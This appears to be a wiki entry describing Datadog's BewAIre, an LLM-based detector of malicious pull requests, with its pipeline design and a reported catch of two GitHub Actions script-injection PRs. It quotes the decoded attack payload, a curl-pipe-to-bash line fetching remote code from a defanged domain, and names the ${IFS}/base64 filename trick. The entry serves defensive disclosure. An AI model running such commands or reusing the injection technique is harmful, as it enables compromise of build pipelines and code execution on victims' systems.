Skip to content

SYSTEM Cited by 1 source

BewAIre

BewAIre is Datadog's LLM-driven malicious-PR detection pipeline. It continuously ingests GitHub events across internal + external repositories (≈10,000 PRs per week), selects security-relevant triggers (PRs, pushes), extracts + normalizes + enriches each diff, and classifies it as benign or malicious via a two-stage LLM pipeline with structured-rationale output.

Malicious verdicts forward to Datadog Cloud SIEM where a detection rule generates enriched security signals; Datadog's Security Incident Response Team (SIRT) triages them as cases, escalating to incidents when warranted. BewAIre was first disclosed in Datadog's 2025 Detecting Malicious PRs at Scale post; the 2026-03-09 hackerbot-claw retrospective is its first-disclosed production catch.

Shape

  • Input: continuous GitHub-event stream (PRs, pushes).
  • Filter: security-relevant triggers only.
  • Diff processing: extract, normalize, enrich.
  • Classifier: two-stage LLM pipeline producing {verdict, structured rationale}.
  • Output routing: malicious verdicts → Cloud SIEM → detection rule → enriched signal → SIRT case → incident (if escalated).

Canonical wiki instance of patterns/llm-pr-code-review.

Disclosed production datum

On 2026-02-27, BewAIre fired the alert on PR #7 in DataDog/datadog-iac-scanner ~33 seconds after the PR opened (05:26:25 → 05:26:58). 18 minutes later it caught PR #8 on the same repo attempting a closely related exploit with a different filename. Both PRs were GitHub Actions script-injection attempts via ${IFS}-obfuscated base64 payloads embedded in filenames under documentation/rules/. Decoded payload: curl -sSfL hackmoltrepeat[.]com/molt | bash.

Not disclosed

  • Classifier model / prompt / fine-tuning data.
  • False-positive / false-negative rates.
  • Per-model cost at 10K-weekly-PR volume.
  • How BewAIre's classification evolves as attackers adapt.
  • Latency distribution beyond the ~33-s datum.

Seen in

Last updated · 200 distilled / 1,178 read